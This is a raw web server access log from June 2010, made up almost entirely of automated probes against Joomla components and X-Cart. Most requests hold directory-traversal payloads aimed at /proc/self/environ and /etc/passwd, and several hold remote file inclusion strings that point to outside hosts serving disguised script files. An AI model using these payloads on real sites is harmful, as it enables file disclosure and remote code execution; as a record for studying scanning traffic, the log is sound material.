72.18.137.210 - - [13/Jun/2010:02:04:35 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
94.23.6.211 - - [13/Jun/2010:02:04:38 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:04:39 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:04:58 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:04:58 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:05:32 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:05:32 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:05:59 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:05:59 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
68.178.194.232 - - [13/Jun/2010:02:06:45 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.811"
109.123.87.182 - - [13/Jun/2010:02:06:56 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
93.159.16.132 - - [13/Jun/2010:02:07:20 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
198.171.172.97 - - [13/Jun/2010:02:08:35 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
180.150.132.234 - - [13/Jun/2010:02:10:58 -0500] "GET /logs/access_log.1274832000/?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
180.150.132.234 - - [13/Jun/2010:02:10:58 -0500] "GET /?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
180.150.132.234 - - [13/Jun/2010:02:10:59 -0500] "GET /logs/?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.810"
207.46.13.86 - - [13/Jun/2010:02:11:06 -0500] "GET /logs/ HTTP/1.1" 200 9328 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.205.85.5 - - [13/Jun/2010:02:12:10 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:02:12:10 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:02:12:10 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
219.240.36.36 - - [13/Jun/2010:02:12:40 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
109.123.87.182 - - [13/Jun/2010:02:13:05 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
109.123.87.182 - - [13/Jun/2010:02:13:06 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
109.123.87.182 - - [13/Jun/2010:02:13:06 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
109.123.87.182 - - [13/Jun/2010:02:14:13 -0500] "GET /logs/access_log.1274572800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
66.71.188.11 - - [13/Jun/2010:02:14:38 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:02:14:39 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
219.240.36.36 - - [13/Jun/2010:02:15:34 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:02:15:35 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:02:15:36 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
67.205.85.5 - - [13/Jun/2010:02:16:08 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:02:16:08 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:02:16:08 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
207.46.13.51 - - [13/Jun/2010:02:17:07 -0500] "GET /logs/access_log.1261180800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [13/Jun/2010:02:17:13 -0500] "GET /logs/access_log.1273795200 HTTP/1.0" 200 533939 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
122.252.7.141 - - [13/Jun/2010:02:18:04 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:02:18:04 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:02:18:05 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
109.123.87.182 - - [13/Jun/2010:02:18:10 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
93.159.16.132 - - [13/Jun/2010:02:18:21 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
68.178.194.232 - - [13/Jun/2010:02:18:24 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.811"
92.240.69.19 - - [13/Jun/2010:02:18:31 -0500] "GET /logs/index2.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
92.240.69.19 - - [13/Jun/2010:02:18:33 -0500] "GET /index2.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
81.174.65.26 - - [13/Jun/2010:02:21:02 -0500] "GET /logs//xcart/customer/giftcert?xcart_dir=arif? HTTP/1.1" 404 313 "-""libwww-perl/5.833"
81.174.65.26 - - [13/Jun/2010:02:21:03 -0500] "GET //xcart/customer/giftcert?xcart_dir=arif? HTTP/1.1" 404 308 "-""libwww-perl/5.833"
81.174.65.26 - - [13/Jun/2010:02:21:06 -0500] "GET /logs//xcart/customer/giftcert?xcart_dir=arif? HTTP/1.1" 404 313 "-""libwww-perl/5.833"
81.174.65.26 - - [13/Jun/2010:02:21:07 -0500] "GET //xcart/customer/giftcert?xcart_dir=arif? HTTP/1.1" 404 308 "-""libwww-perl/5.833"
68.178.194.232 - - [13/Jun/2010:02:22:01 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.811"
68.178.194.232 - - [13/Jun/2010:02:22:02 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.811"
68.178.194.232 - - [13/Jun/2010:02:22:02 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.811"
109.123.87.182 - - [13/Jun/2010:02:22:24 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
109.123.87.182 - - [13/Jun/2010:02:22:24 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
109.123.87.182 - - [13/Jun/2010:02:22:24 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
68.178.194.232 - - [13/Jun/2010:02:23:18 -0500] "GET /logs/access_log.1274572800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.811"
68.178.194.232 - - [13/Jun/2010:02:24:24 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.811"
68.178.194.232 - - [13/Jun/2010:02:24:24 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.811"
68.178.194.232 - - [13/Jun/2010:02:24:24 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.811"
216.105.40.177 - - [13/Jun/2010:02:25:04 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""WebRingChecker/1.71 LWP/5.79"
207.46.199.51 - - [13/Jun/2010:02:27:06 -0500] "GET /costume/thmb6.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.159.16.132 - - [13/Jun/2010:02:29:18 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
93.159.16.132 - - [13/Jun/2010:02:29:19 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
93.159.16.132 - - [13/Jun/2010:02:29:19 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
93.159.16.132 - - [13/Jun/2010:02:30:24 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
93.159.16.132 - - [13/Jun/2010:02:30:24 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
93.159.16.132 - - [13/Jun/2010:02:31:04 -0500] "GET /logs/access_log.1274572800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
93.159.16.132 - - [13/Jun/2010:02:33:55 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
93.159.16.132 - - [13/Jun/2010:02:33:56 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
93.159.16.132 - - [13/Jun/2010:02:33:56 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
81.93.240.122 - - [13/Jun/2010:02:35:39 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:02:35:44 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:36:18 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:36:21 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
59.21.247.137 - - [13/Jun/2010:02:36:39 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
59.21.247.137 - - [13/Jun/2010:02:36:41 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
114.108.151.149 - - [13/Jun/2010:02:36:57 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [13/Jun/2010:02:36:59 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.200.244.57 - - [13/Jun/2010:02:37:00 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.200.244.57 - - [13/Jun/2010:02:37:00 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:02:37:26 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:02:37:26 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:02:37:26 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:02:37:30 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:02:37:30 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:02:37:30 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:02:37:36 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:02:37:36 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:02:37:36 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:02:37:36 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:37:44 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:37:44 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:37:44 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:37:49 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:37:50 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:37:50 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:37:52 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:37:53 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
174.121.227.168 - - [13/Jun/2010:02:37:57 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.227.168 - - [13/Jun/2010:02:37:58 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.227.168 - - [13/Jun/2010:02:37:58 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.227.168 - - [13/Jun/2010:02:37:58 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
92.103.254.153 - - [13/Jun/2010:02:38:07 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:38:07 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [13/Jun/2010:02:38:36 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [13/Jun/2010:02:38:36 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [13/Jun/2010:02:38:36 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [13/Jun/2010:02:38:37 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [13/Jun/2010:02:38:37 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [13/Jun/2010:02:38:37 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
59.21.247.137 - - [13/Jun/2010:02:39:44 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
59.21.247.137 - - [13/Jun/2010:02:39:45 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
59.21.247.137 - - [13/Jun/2010:02:39:46 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
59.21.247.137 - - [13/Jun/2010:02:39:46 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
59.21.247.137 - - [13/Jun/2010:02:39:46 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
59.21.247.137 - - [13/Jun/2010:02:39:47 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
200.202.243.41 - - [13/Jun/2010:02:40:11 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
92.103.254.153 - - [13/Jun/2010:02:41:08 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:41:08 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:41:08 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:41:16 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:41:16 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:41:17 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:02:41:34 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:02:41:34 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
200.202.243.41 - - [13/Jun/2010:02:41:45 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.813"
67.195.112.180 - - [13/Jun/2010:02:41:45 -0500] "GET /logs/access_log.1199750400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.202.243.41 - - [13/Jun/2010:02:41:47 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
200.202.243.41 - - [13/Jun/2010:02:41:47 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
209.200.244.57 - - [13/Jun/2010:02:41:48 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
174.121.227.168 - - [13/Jun/2010:02:42:19 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
91.186.27.166 - - [13/Jun/2010:02:42:21 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
92.103.254.153 - - [13/Jun/2010:02:42:24 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
109.71.41.45 - - [13/Jun/2010:02:42:27 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
92.103.254.153 - - [13/Jun/2010:02:42:30 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:42:31 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
59.21.247.137 - - [13/Jun/2010:02:42:31 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
87.252.2.168 - - [13/Jun/2010:02:42:34 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
87.252.2.168 - - [13/Jun/2010:02:42:34 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
